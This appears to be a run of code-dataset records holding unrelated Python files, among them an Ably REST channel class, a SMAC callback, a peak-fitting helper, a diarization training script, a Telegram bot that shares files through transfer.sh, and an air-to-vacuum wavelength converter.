'Wildcard client_id is reserved and cannot be used when publishing messages',\n 400, 40012)\n elif m.client_id is not None and not self.ably.auth.can_assume_client_id(m.client_id):\n raise IncompatibleClientIdException(\n 'Cannot publish with client_id \\'{}\\' as it is incompatible with the '\n 'current configured client_id \\'{}\\''.format(m.client_id, self.ably.auth.client_id),\n 400, 40012)\n\n if self.cipher:\n m.encrypt(self.__cipher)\n\n request_body_list.append(m)\n\n request_body = [\n message.as_dict(binary=self.ably.options.use_binary_protocol)\n for message in request_body_list]\n\n if len(request_body) == 1:\n request_body = request_body[0]\n\n return request_body\n\n @singledispatch\n def _publish(self, arg, *args, **kwargs):\n raise TypeError('Unexpected type %s' % type(arg))\n\n @_publish.register(Message)\n async def publish_message(self, message, params=None, timeout=None):\n return await self.publish_messages([message], params, timeout=timeout)\n\n @_publish.register(list)\n async def publish_messages(self, messages, params=None, timeout=None):\n request_body = self.__publish_request_body(messages)\n if not self.ably.options.use_binary_protocol:\n request_body = json.dumps(request_body, separators=(',', ':'))\n else:\n request_body = msgpack.packb(request_body, use_bin_type=True)\n\n path = self.__base_path + 'messages'\n if params:\n params = {k: str(v).lower() if type(v) is bool else v for k, v in params.items()}\n path += '?' + parse.urlencode(params)\n return await self.ably.http.post(path, body=request_body, timeout=timeout)\n\n @_publish.register(str)\n async def publish_name_data(self, name, data, timeout=None):\n messages = [Message(name, data)]\n return await self.publish_messages(messages, timeout=timeout)\n\n async def publish(self, *args, **kwargs):\n \"\"\"Publishes a message on this channel.\n\n :Parameters:\n - `name`: the name for this message.\n - `data`: the data for this message.\n - `messages`: list of `Message` objects to be published.\n - `message`: a single `Message` objet to be published\n\n :attention: You can publish using `name` and `data` OR `messages` OR\n `message`, never all three.\n \"\"\"\n # For backwards compatibility\n if len(args) == 0:\n if len(kwargs) == 0:\n return await self.publish_name_data(None, None)\n\n if 'name' in kwargs or 'data' in kwargs:\n name = kwargs.pop('name', None)\n data = kwargs.pop('data', None)\n return await self.publish_name_data(name, data, **kwargs)\n\n if 'messages' in kwargs:\n messages = kwargs.pop('messages')\n return await self.publish_messages(messages, **kwargs)\n\n return await self._publish(*args, **kwargs)\n\n async def status(self):\n \"\"\"Retrieves current channel active status with no. of publishers, subscribers, presence_members etc\"\"\"\n\n path = '/channels/%s' % self.name\n response = await self.ably.http.get(path)\n obj = response.to_native()\n return ChannelDetails.from_dict(obj)\n\n @property\n def ably(self):\n return self.__ably\n\n @property\n def name(self):\n return self.__name\n\n @property\n def base_path(self):\n return self.__base_path\n\n @property\n def cipher(self):\n return self.__cipher\n\n @property\n def options(self):\n return self.__options\n\n @property\n def presence(self):\n return self.__presence\n\n @options.setter\n def options(self, options):\n self.__options = options\n\n if options and 'cipher' in options:\n cipher = options.get('cipher')\n if cipher is not None:\n cipher = get_cipher(cipher)\n self.__cipher = cipher\n\n\nclass Channels:\n def __init__(self, rest):\n self.__ably = rest\n self.__all: dict = OrderedDict()\n\n def get(self, name, **kwargs):\n if isinstance(name, bytes):\n name = name.decode('ascii')\n\n if name not in self.__all:\n result = self.__all[name] = Channel(self.__ably, name, kwargs)\n else:\n result = self.__all[name]\n if len(kwargs) != 0:\n result.options = kwargs\n\n return result\n\n def __getitem__(self, key):\n return self.get(key)\n\n def __getattr__(self, name):\n return self.get(name)\n\n def __contains__(self, item):\n if isinstance(item, Channel):\n name = item.name\n elif isinstance(item, bytes):\n name = item.decode('ascii')\n else:\n name = item\n\n return name in self.__all\n\n def __iter__(self) -> Iterator[str]:\n return iter(self.__all.values())\n\n # RSN4\n def release(self, name: str):\n \"\"\"Releases a Channel object, deleting it, and enabling it to be garbage collected.\n If the channel does not exist, nothing happens.\n\n It also removes any listeners associated with the channel.\n\n Parameters\n ----------\n name: str\n Channel name\n \"\"\"\n\n if name not in self.__all:\n return\n del self.__all[name]\n","repo_name":"ably/ably-python","sub_path":"ably/rest/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":7577,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"3"} +{"seq_id":"14475237655","text":"import numpy as np\nimport json\nimport os\nfrom smac.callback import Callback\nfrom src.scaler import Scaler\nfrom src.constants import INPUT_SHAPE\n\n\nclass SaveAngleCallback(Callback):\n \"\"\"\n Callback class that saves metrics during the SMAC optimization process.\n\n Attributes:\n - model (Model): An instance of the model to be used for optimization.\n - path (str): Path to the output directory.\n - metrics_dict (Dict[int, Dict[str, Union[float, int]]]): Dictionary storing metrics for each trial.\n - best_p_norm (float): Best observed p_norm value.\n - best_angle (Union[float, None]): Best observed angle corresponding to best_p_norm.\n - trial_counter (int): Keeps track of the number of trials.\n - scaler (Scaler): Instance of Scaler class for scaling operations.\n \"\"\"\n\n def __init__(self, model, path: str) -> None:\n self.metrics_dict = {}\n self.best_p_norm = float('inf')\n self.best_angle = None\n self.trial_counter = 0\n self.scaler = Scaler()\n self.model = model\n self.path = path\n self._load_existing_data()\n super().__init__()\n\n def _load_existing_data(self) -> None:\n file_path = f'smac3_output/{self.path}/metrics.json'\n if os.path.exists(file_path):\n with open(file_path, 'r') as file:\n loaded_data = json.load(file)\n self.trial_counter = max(map(int, loaded_data.keys()))\n self.metrics_dict = {int(k): v for k, v in loaded_data.items()}\n self.best_p_norm = self.metrics_dict[self.trial_counter]['best_p_norm']\n self.best_angle = self.metrics_dict[self.trial_counter]['angle_for_best_p_norm']\n\n def on_tell_start(self, smbo, info, value) -> None:\n self.trial_counter += 1\n\n config = info.config\n\n x = []\n for i in range(INPUT_SHAPE[0]):\n x_i = config[f\"{i:02}\"]\n x.append(x_i)\n\n y = self.model.simulate(x).reshape(-1)\n current_angle = float(np.max(y))\n current_p_norm = float(value.cost)\n\n if current_p_norm < self.best_p_norm:\n self.best_p_norm = current_p_norm\n self.best_angle = current_angle\n\n self.metrics_dict[self.trial_counter] = {\n 'angle': current_angle,\n 'p_norm': current_p_norm,\n 'best_p_norm': self.best_p_norm,\n 'angle_for_best_p_norm': self.best_angle\n }\n\n with open(f'smac3_output/{self.path}/metrics.json', 'w') as file:\n json.dump(self.metrics_dict, file, indent=4)\n","repo_name":"eismont21/knowledge-surrogate-opt","sub_path":"src/sbo/save_angle_callback.py","file_name":"save_angle_callback.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71858427281","text":"\nfrom src.common.fitting import *\n\nimport matplotlib.pyplot as plt\n\ndef analyse_back_peak(xs, ys, yerr, threshold, hys, xerr=None, file_name = None,\n title=None, xlabel = None, ylabel=None, upper=None, lower=None):\n #\n # find peak\n #\n if upper is None and lower is None:\n upper = len(xs) - 1\n while ys[upper] < hys * threshold:\n upper = upper - 1\n lower = upper\n while ys[lower] > threshold:\n lower = lower - 1\n opt, cov, chi_sq = do_normal_regression(xs[lower:upper], ys[lower:upper],\n yerr[lower:upper], xErr=xerr[lower:upper] if xerr is not None else None)\n if file_name is not None:\n plot_peak_res(xs, ys, yerr, xerr, lower, upper, file_name, title, xlabel, ylabel, opt, cov, chi_sq)\n return (opt,cov, chi_sq)\n\ndef plot_peak_res(x, y, y_err, x_err, lower, upper, filename, name, x_label, y_label, opt, cov, chi_sq):\n mod = opt[2] * np.exp(-1.0 * (x[lower:upper] - opt[0])**2/(2*opt[1]**2))\n\n print(\"\"\"Gaußfit {}\nmu : {:.3e} \\pm {:3e}\nsigma : {:.3e} \\pm {:.3e} \nhight: : {:.3e} \\pm {:.3e}\nchi_sq : {:.3e} \\n\n\"\"\".format(name, opt[0], np.sqrt(cov[0][0]), opt[1], np.sqrt(cov[1][1]), opt[2],\n np.sqrt(cov[2][2]), chi_sq))\n\n plt.clf()\n plt.close('all')\n plt.figure(figsize=(8,6), dpi=1200)\n ax_plot = plt.subplot2grid((3,1), (0,0), rowspan=2)\n ax_res = plt.subplot2grid((3,1), (2,0), rowspan=1)\n\n ax_plot.errorbar(x, y, xerr=x_err, yerr=y_err, color=\"r\", linewidth = 0,\n markersize=0, marker=\",\", elinewidth=1)\n ax_plot.plot(x[lower:upper], mod);\n\n ax_plot.axvspan(x[lower], x[upper], label=\"selected data\", alpha=0.2)\n\n y_prop_err = np.zeros(len(y_err[lower:upper]))\n if x_err is not None:\n y_prop_err = [ (mod[i + 1] - mod[i])/(x[i+1]-x[i]) * x_err[lower + i] for i in range(len(mod) - 1) ]\n y_prop_err.append((mod[-1] - mod[-2])/(x[upper] - x[upper -1]) * x_err[upper])\n y_prop_err = np.sqrt(np.array(y_prop_err)**2 + y_err[lower:upper]**2)\n\n ax_res.errorbar(x[lower:upper], y[lower:upper]-mod, yerr=y_prop_err, color=\"r\", linewidth = 0,\n markersize=0, marker=\",\", elinewidth=1, capsize=2)\n ax_res.plot(x[lower:upper], np.zeros(len(x[lower:upper])))\n ax_res.set_xlabel(\"Channels\")\n ax_plot.set_ylabel(\"Events\")\n ax_res.set_ylabel(\"Diviation\")\n ax_plot.set_title(name)\n ax_res.grid(True)\n ax_plot.grid(True)\n\n plt.savefig(filename)\n plt.clf()\n","repo_name":"Lenni/F_Praktikum","sub_path":"src/common/analyse_peak.py","file_name":"analyse_peak.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43227690101","text":"class Solution(object):\n def superPow(self, a, b):\n \"\"\"\n :type a: int\n :type b: List[int]\n :rtype: int\n \"\"\"\n if len(b) == 1 and b[0] == 0:\n return 1\n\n a %= 1337\n\n c = a\n dct = {1: c}\n for i in range(2, 1338):\n c *= a\n c %= 1337\n if c == a:\n break\n dct[i] = c\n\n den = len(dct)\n dct[0] = dct[i - 1]\n\n pre = 0\n for elem in b:\n pre = (pre * 10 + elem) % den\n\n return dct[pre]\n\n\nprint(Solution().superPow(13, [3, 9, 8, 3, 5, 2, 7, 8, 1, 0, 2, 4]))\n","repo_name":"wufangjie/leetcode","sub_path":"372. Super Pow.py","file_name":"372. Super Pow.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"21242287739","text":"import os\nfrom ckan.plugins import implements, SingletonPlugin\nfrom ckan.plugins import IRoutes\nfrom ckan.config.routing import SubMapper\n\nclass DadosGovBrDatasetView(SingletonPlugin):\n '''The customized dataset view screen.\n '''\n implements(IRoutes, inherit=True)\n\n def before_map(self, map):\n # Default mappings copied from ckan/config/routing.py that we want to preserve.\n with SubMapper(map, controller='package') as m:\n m.connect('/dataset/{action}',\n requirements=dict(action='|'.join([\n 'list',\n 'new',\n 'autocomplete',\n 'search'\n ]))\n )\n m.connect('/dataset/{action}/{id}/{revision}', action='read_ajax',\n requirements=dict(action='|'.join([\n 'read',\n 'edit',\n 'authz',\n 'history',\n ]))\n )\n m.connect('/dataset/{action}/{id}',\n requirements=dict(action='|'.join([\n 'edit',\n 'editresources',\n 'authz',\n 'history',\n 'read_ajax',\n 'history_ajax',\n ]))\n )\n m.connect('/dataset/{id}.{format}', action='read')\n m.connect('/dataset/{id}/resource/{resource_id}', action='resource_read')\n \n # Our new custom mapping.\n map.connect('/dataset/{id}',\n controller='ckanext.dadosgovbr.controllers.package:DadosGovBrDatasetController',\n action='read')\n return map\n\n","repo_name":"dadosgovbr/ckanext-dadosgovbr","sub_path":"ckanext/dadosgovbr/dataset_plugin.py","file_name":"dataset_plugin.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"} +{"seq_id":"167630770","text":"#230201026 Ali Görkem Yalçın\n#100000 took 48 minutes\n#10000 takes 26 seconds\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef lcg(modulus, a, c, seed):\n while True:\n seed = (a * seed + c) % modulus\n return seed\n \nlista=[]\nlistb=[]\nlistc=[]\nlistx=[]\n\nlistavga=[]\nlistavgb=[]\nlistavgc=[]\nlistavgx=[]\n\nlistvarx=[]\n\ncount=0\navga=0\navgb=0\navgc=0\navgx=0\n\nwhile count<100000:\n count = count + 1\n a = int(lcg(6,123,343,np.random.rand()))+1\n b = int(lcg(4,154,312,np.random.rand()))+1\n c = int(lcg(2,213,323,np.random.rand()))\n if c == 1:\n c = 1\n elif c == 0:\n c = -1\n x = a + b*c\n avga = ((count-1)*avga + a)/count\n avgb = ((count-1)*avgb + b)/count\n avgc = ((count-1)*avgc + c)/count\n avgx = ((count-1)*avgx + x)/count\n lista.append(a)\n listb.append(b)\n listc.append(c)\n listx.append(x)\n \n varx=0\n u=0\n sum=0\n \n for i in listx:\n u=u+i\n u=u/count\n \n for i in listx:\n sum=sum+((u-i)**2)\n \n if len(listx)==1: #to not get division by 0 error\n varx=0\n else:\n varx=sum/(len(listx)-1)\n \n \n listvarx.append(varx)\n listavga.append(avga)\n listavgb.append(avgb)\n listavgc.append(avgc)\n listavgx.append(avgx)\nuser_input=(input(\"Please press\\n 1 for variable a\\n 2 for variable b\\n 3 for variable c\\n 4 for variable x\\n 5 for average of a\\n 6 for average of b\\n 7 for average of c\\n 8 for average of x \\n 9 for variance of x\\n\"))\nif user_input==(\"1\"):\n plt.hist(lista)\nelif user_input==(\"2\"):\n plt.hist(listb)\nelif user_input==(\"3\"):\n plt.hist(listc)\nelif user_input==(\"4\"):\n plt.hist(listx)\nelif user_input==(\"5\"):\n plt.hist(listavga)\nelif user_input==(\"6\"):\n plt.hist(listavgb)\nelif user_input==(\"7\"):\n plt.hist(listavgc)\nelif user_input==(\"8\"):\n plt.hist(listavgx)\nelif user_input==(\"9\"):\n plt.hist(listvarx)","repo_name":"gorkemyalcin/Ceng114","sub_path":"CENG114_HW1_230201206/Plotter.230201026.py","file_name":"Plotter.230201026.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"75327458002","text":"#!/usr/bin/env python3\n\nimport os\nimport torch\nimport argparse\nimport random\nfrom diarization_dataset import DiarDataset\nimport numpy as np\nimport socket\nfrom model.faster_rcnn.resnet import resnet\nfrom model.utils.config import cfg, cfg_from_file\nfrom utils import train\nimport pickle\n\nnp.set_printoptions(suppress=True)\nprint(socket.gethostname())\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\nparser = argparse.ArgumentParser(\n description='Region Proposal Network based Speaker Diarization Training')\nparser.add_argument('exp_dir', type=str,\n help='path of experiment')\nparser.add_argument('train_dir', type=str,\n help='directory for training')\nparser.add_argument('dev_dir', default=None, type=str,\n help='directory for validation')\nparser.add_argument('--cfg_file', default=\"\", type=str,\n help='configure file')\n\n# data process parameters\nparser.add_argument('--rate', default=8000, type=int,\n help='sample rate')\nparser.add_argument('--frame_size', default=512, type=int,\n help='frame size')\nparser.add_argument('--frame_shift', default=80, type=int,\n help='frame shift')\nparser.add_argument('--merge_dis', default=0.0, type=float,\n help='merge two segments if their distance is smaller than merge_dis')\nparser.add_argument('--min_dis', default=0.2, type=float,\n help='minimum length of each segment, discard segments that are too short')\nparser.add_argument('--padded_len', default=20, type=int,\n help='max number of segments in a sample')\n\n# training parameters\nparser.add_argument('--resume', default=None, type=str,\n help='path to latest checkpoint')\nparser.add_argument('--initialize', default=0, type=int,\n help='whether to use checkpoint to initialize model parameters')\nparser.add_argument('--freeze', default=0, type=int,\n help='whether to freeze the model parameters')\nparser.add_argument('--set_bn_fix', default=0, type=int,\n help='whether to set batchnorm fixed')\nparser.add_argument('--pretrain_model', default=None, type=str,\n help='the directory of pretrained model')\nparser.add_argument('--pretrain_resnet_model', default=None, type=str,\n help='the directory of pretrained resnet model')\nparser.add_argument('--epochs', default=10, type=int,\n help='number of total epochs to run')\nparser.add_argument('--batch_size', default=8, type=int,\n help='mini-batch size')\nparser.add_argument('--num_workers', default=0, type=int,\n help='number of workers for data loading')\nparser.add_argument('--optimizer', default='sgd', type=str,\n help='optimizer')\nparser.add_argument('--lr', default=0.01, type=float,\n help='initial learning rate')\nparser.add_argument('--scheduler', default='reduce', type=str,\n help='learning rate scheduler')\nparser.add_argument('--min_lr', default=0.0001, type=float, \n help='minimum learning rate')\nparser.add_argument('--patience', default=10, type=int, \n help='patience to reduce learning rate')\nparser.add_argument('--clip', default=5.0, type=float, \n help='gradient clip')\nparser.add_argument('--seed', default=7, type=int,\n help='random seed')\nparser.add_argument('--alpha', default=1.0, type=float,\n help='it seems that the RCNN_loss_cls_spk is dominating \\\n the loss function. So I want to give it a smaller weight')\n\n# network parameters\nparser.add_argument('--arch', default='res101', type=str, \n help='model architecture')\nparser.add_argument('--nclass', default=5963, type=int, \n help='number of classes (5962 speakers and background)')\n\n# validate parameters\nparser.add_argument('--eval_interval', default=20, type=int,\n help='number of epochs to save the model')\nparser.add_argument('--num_dev', default=-1, type=int,\n help='the dev set is too large, just use some of it')\n\n# visualize\nparser.add_argument('--use_tfb', dest='use_tfboard',\n help='whether use tensorboard',\n action='store_true')\n\ndef main():\n global args\n args = parser.parse_args()\n\n # prepare log file\n log_file = open(\"{}/log/train_log\".format(args.exp_dir), 'w')\n log_file.write(\"{}\\n\".format(args))\n\n # set random seed\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # prepare training set and dev set\n train_dataset = DiarDataset(args.train_dir, args.rate, args.frame_size, args.frame_shift, None, args.padded_len, args.merge_dis, args.min_dis)\n dev_dataset = DiarDataset(args.dev_dir, args.rate, args.frame_size, args.frame_shift, None, args.padded_len, args.merge_dis, args.min_dis, args.num_dev)\n\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n pin_memory=True,\n shuffle=True)\n dev_loader = torch.utils.data.DataLoader(dataset=dev_dataset,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n pin_memory=True,\n shuffle=False)\n log_file.write(\"{} TRAIN segments, {} DEV segments\\n\".format(len(train_dataset), len(dev_dataset)))\n\n if args.cfg_file == \"\":\n args.cfg_file = \"cfgs/{}.yml\".format(args.arch)\n log_file.write(\"Using configure file {}\\n\".format(args.cfg_file))\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n\n # save cfg file\n with open('{}/cfg.pkl'.format(args.exp_dir), 'wb') as handle:\n pickle.dump(cfg, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n # initilize the network here.\n start_epoch = 1\n if args.arch == 'res101':\n model = resnet(args.nclass, 101, pretrained=args.pretrain_resnet_model, freeze=args.freeze, set_bn_fix=args.set_bn_fix)\n else:\n raise ValueError(\"Network is not supported\")\n model.create_architecture()\n model = model.to(device)\n\n if args.pretrain_model is not None:\n log_file.write(\"Loading pretrained weights from {}\\n\".format(args.pretrain_model))\n checkpoint = torch.load(args.pretrain_model)\n pretrained_dict = checkpoint['model'] \n model_dict = model.state_dict()\n pretrained_dict_new = {}\n para_list = []\n for k, v in pretrained_dict.items():\n assert k in model_dict\n if model_dict[k].size() == pretrained_dict[k].size():\n pretrained_dict_new[k] = v\n else:\n para_list.append(k)\n log_file.write(\"Total {} parameters, Loaded {} parameters\\n\".format(len(pretrained_dict), len(pretrained_dict_new)))\n log_file.write(\"Not loading {} because of different sizes\\n\".format(\", \".join(para_list)))\n model_dict.update(pretrained_dict_new) \n model.load_state_dict(model_dict)\n log_file.write(\"Loaded checkpoint '{}' (epoch {} iter {})\\n\".format(args.pretrain_model, checkpoint['epoch'], checkpoint['iter']))\n log_file.write(\"Best score {}\\n\".format(checkpoint['best_score']))\n\n params = []\n for key, value in dict(model.named_parameters()).items():\n if value.requires_grad:\n if 'bias' in key:\n params += [{'params':[value],'lr':args.lr * (cfg.TRAIN.DOUBLE_BIAS + 1), \\\n 'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]\n else:\n params += [{'params':[value],'lr':args.lr, 'weight_decay': cfg.TRAIN.WEIGHT_DECAY}]\n\n # define optimizer\n if args.optimizer == 'adam':\n optimizer = torch.optim.Adam(params)\n elif args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(params, momentum=0.9)\n else:\n raise ValueError(\"Optimizer type not defined.\")\n\n start_epoch, start_iter, best_score = 1, 1, float('inf')\n # load parameters\n if args.resume is not None:\n if os.path.isfile(args.resume):\n log_file.write(\"Loading checkpoint '{}'\\n\".format(args.resume))\n checkpoint = torch.load(args.resume)\n model.load_state_dict(checkpoint['model'])\n if not args.initialize:\n optimizer.load_state_dict(checkpoint['optimizer'])\n start_epoch = checkpoint['epoch']\n start_iter = checkpoint['iter'] + 1\n if start_iter > len(train_loader):\n start_epoch += 1\n start_iter = 1 \n\n log_file.write(\"Loaded checkpoint '{}' (epoch {} iter {})\\n\"\n .format(args.resume, checkpoint['epoch'], checkpoint['iter']))\n log_file.write(\"Best score {:.4f}\\n\".format(checkpoint['best_score']))\n else:\n raise ValueError(\"=> No checkpoint found at '{}'\".format(args.resume))\n log_file.flush()\n\n # use tensorboard to monitor the loss\n if args.use_tfboard:\n from tensorboardX import SummaryWriter\n logger = SummaryWriter(\"{}/log\".format(args.exp_dir))\n else:\n logger = None\n\n args.start_epoch, args.start_iter, args.best_score = start_epoch, start_iter, best_score\n # train\n train(train_loader, dev_loader, model, device, optimizer, logger, log_file, args)\n\n if args.use_tfboard:\n logger.close()\n log_file.close()\n return 0\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"HuangZiliAndy/RPNSD","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"3"} +{"seq_id":"9992102483","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# (c) Shrimadhav U K\r\n\r\n\r\nimport logging\r\nlogging.basicConfig(level=logging.DEBUG,\r\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\nlogger = logging.getLogger(__name__)\r\n\r\nimport aiohttp\r\nimport uuid\r\nimport re\r\nimport json\r\nfrom datetime import datetime\r\n\r\nimport os\r\nimport subprocess\r\nimport time\r\nimport asyncio\r\nfrom tools.config import Config\r\nfrom tools.progress import progress_for_pyrogram, humanbytes\r\nfrom tools.translation import Translation\r\nimport pyrogram\r\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\r\nusers = []\r\n\r\n\r\n@pyrogram.Client.on_message()\r\nasync def get_link(bot, update):\r\n if str(update.from_user.id) in Config.BANNED_USERS:\r\n await bot.send_message(\r\n chat_id=update.chat.id,\r\n text=Translation.ABUSIVE_USERS,\r\n reply_to_message_id=update.message_id,\r\n disable_web_page_preview=True,\r\n parse_mode=\"html\"\r\n )\r\n return\r\n elif update.text == \"/start\":\r\n await bot.send_message(\r\n chat_id=update.chat.id,\r\n text=Translation.START_TEXT,\r\n reply_to_message_id=update.message_id\r\n )\r\n return\r\n elif update.text == \"/help\" or update.text == \"/about\":\r\n await bot.send_message(\r\n chat_id=update.chat.id,\r\n text=Translation.HELP_USER,\r\n parse_mode=\"html\",\r\n disable_web_page_preview=True,\r\n reply_to_message_id=update.message_id\r\n )\r\n return\r\n elif update.document is not None or update.video is not None or update.photo is not None or update.audio is not None or update.animation is not None or update.voice is not None or update.sticker is not None or update.video_note is not None:\r\n reply_message = update\r\n else:\r\n return\r\n if update.from_user.id not in users:\r\n users.append(update.from_user.id)\r\n #else:\r\n #await bot.send_message(\r\n #chat_id=update.chat.id,\r\n #text=Translation.ABS_TEXT,\r\n #reply_to_message_id=update.message_id\r\n #)\r\n #return\r\n download_location = Config.DOWNLOAD_LOCATION + \"/\" + str(update.from_user.id) + \"/\"\r\n a = await bot.send_message(\r\n chat_id=update.chat.id,\r\n text=Translation.DOWNLOAD_START,\r\n reply_to_message_id=update.message_id\r\n )\r\n c_time = time.time()\r\n after_download_file_name = await bot.download_media(\r\n message=reply_message,\r\n file_name=download_location,\r\n progress=progress_for_pyrogram,\r\n progress_args=(\r\n bot,\r\n Translation.DOWNLOADING,\r\n a.message_id,\r\n update.chat.id,\r\n c_time\r\n )\r\n )\r\n '''await bot.edit_message_text(\r\n text='📤 Uploading file...',\r\n chat_id=update.chat.id,\r\n message_id=a.message_id\r\n )'''\r\n \r\n filesize = os.path.getsize(after_download_file_name)\r\n filename = os.path.basename(after_download_file_name)\r\n download_extension = after_download_file_name.rsplit(\".\", 1)[-1]\r\n end_one = datetime.now()\r\n url = \"https://transfer.sh/{}\".format(str(filename))\r\n max_days = \"5\"\r\n command_to_exec = [\r\n \"curl\",\r\n # \"-H\", 'Max-Downloads: 1',\r\n \"-H\", 'Max-Days: 5', # + max_days + '',\r\n \"--upload-file\", after_download_file_name,\r\n url\r\n ]\r\n await bot.edit_message_text(\r\n text=Translation.UPLOAD_START,\r\n chat_id=update.chat.id,\r\n message_id=a.message_id\r\n )\r\n try:\r\n logger.info(command_to_exec)\r\n t_response = subprocess.check_output(command_to_exec, stderr=subprocess.STDOUT)\r\n except subprocess.CalledProcessError as exc:\r\n logger.info(\"Status : FAIL\", exc.returncode, exc.output)\r\n await bot.edit_message_text(\r\n chat_id=update.chat.id,\r\n text=exc.output.decode(\"UTF-8\"),\r\n message_id=a.message_id\r\n )\r\n return False\r\n else:\r\n logger.info(t_response)\r\n t_response_arry = t_response.decode(\"UTF-8\").split(\"\\n\")[-1].strip()\r\n await bot.edit_message_text(\r\n chat_id=update.chat.id,\r\n text=Translation.AFTER_GET_DL_LINK.format(\r\n filename,\r\n await humanbytes(filesize),\r\n max_days,\r\n t_response_arry\r\n ),\r\n parse_mode=\"html\",\r\n message_id=a.message_id,\r\n disable_web_page_preview=True\r\n )\r\n return \r\n try:\r\n users.remove(update.from_user.id)\r\n os.remove(after_download_file_name)\r\n except:\r\n pass\r\n","repo_name":"sonicvip/upload","sub_path":"plugins/new_async_fex_v1.py","file_name":"new_async_fex_v1.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1822811899","text":"\"\"\"\n\nContains transcriptions of some IDLUTILS functions to python.\n\n*Source location*:\n $MANGADAP_DIR/python/mangadap/util/idlutils.py\n\n*Python2/3 compliance*::\n\n from __future__ import division\n from __future__ import print_function\n from __future__ import absolute_import\n \n import sys\n if sys.version > '3':\n long = int\n\n*Imports*::\n\n import numpy\n\n*Revision history*:\n | **23 Apr 2015**: Original implementation by K. Westfall (KBW)\n | **20 May 2015**: (KBW) Documentation and Sphinx tests\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport sys\nif sys.version > '3':\n long = int\n\nimport numpy\n\n__author__ = 'Kyle B. Westfall'\n\n#-----------------------------------------------------------------------\ndef airtovac(wave_air):\n \"\"\" \n Wavelengths are corrected for the index of refraction of air under\n standard conditions. Wavelength values below 2000 A will not be\n altered. Uses formula from Ciddor 1996, Applied Optics 62, 958.\n\n Args:\n wave_air (int or float): Wavelength in Angstroms, scalar or\n vector. If this is the only parameter supplied, it will be\n updated on output to contain double precision vacuum\n wavelength(s). \n\n Returns:\n numpy.float64 : The wavelength of the line in vacuum.\n\n Example:\n If the air wavelength is W = 6056.125 (a Krypton line), then\n :func:`airtovac` returns vacuum wavelength of W = 6057.8019.\n \n *Revision history*:\n | Written W. Landsman November 1991\n | Use Ciddor (1996) formula for better accuracy in the infrared \n | Added optional output vector, W Landsman Mar 2011\n | Iterate for better precision W.L./D. Schlegel Mar 2011\n | Transcribed to python, K.B. Westfall Apr 2015\n\n .. note::\n Take care within 1 A of 2000 A. Wavelengths below 2000 A *in\n air* are not altered. \n\n \"\"\"\n\n # Copy the data\n wave_vac = wave_air.astype(numpy.float64) if hasattr(wave_air, \"__len__\") else float(wave_air)\n g = wave_vac > 2000.0 # Only modify above 2000 A\n Ng = numpy.sum(g)\n \n if Ng > 0:\n # Handle both arrays and scalars\n if hasattr(wave_air, \"__len__\"):\n _wave_air = wave_air[g].astype(numpy.float64)\n _wave_vac = wave_vac[g]\n else:\n _wave_air = float(wave_air)\n _wave_vac = float(wave_vac)\n\n for i in range(0,2):\n sigma2 = numpy.square(1.0e4/_wave_vac) #Convert to wavenumber squared\n fact = 1.0 + 5.792105e-2/(238.0185 - sigma2) + 1.67917e-3/(57.362 - sigma2)\n _wave_vac = _wave_air*fact\n\n if hasattr(wave_air, \"__len__\"): # Save the result\n wave_vac[g] = _wave_vac\n else:\n wave_vac = _wave_vac\n\n return wave_vac\n\n\n#-----------------------------------------------------------------------\n\n\n","repo_name":"danielgoddard/DanFF_4_David","sub_path":"git_upload/idlutils.py","file_name":"idlutils.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12763534162","text":"\"\"\" init object account.report \"\"\"\n\nimport logging\n\nfrom odoo import models, api\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass AccountReport(models.AbstractModel):\n \"\"\" init object account.report \"\"\"\n _inherit = 'account.report'\n\n @api.model\n def _get_options(self, previous_options=None):\n \"\"\"\n Override Get Options\n :params previous_options:\n \"\"\"\n options = super()._get_options(previous_options)\n groups_map = {}\n if previous_options and previous_options.get('account_groups'):\n groups_map = dict((opt['id'], opt['selected']) for opt in\n previous_options['account_groups'] if\n opt['id'] != 'divider' and 'selected' in opt)\n options['account_groups'] = []\n for group in self.env['account.group'].search([]):\n options['account_groups'].append({\n 'id': group.id,\n 'name': group.name,\n 'selected': groups_map.get(group.id, False),\n })\n return options\n\n @api.model\n def _get_options_account_groups(self, options):\n \"\"\"\n Get 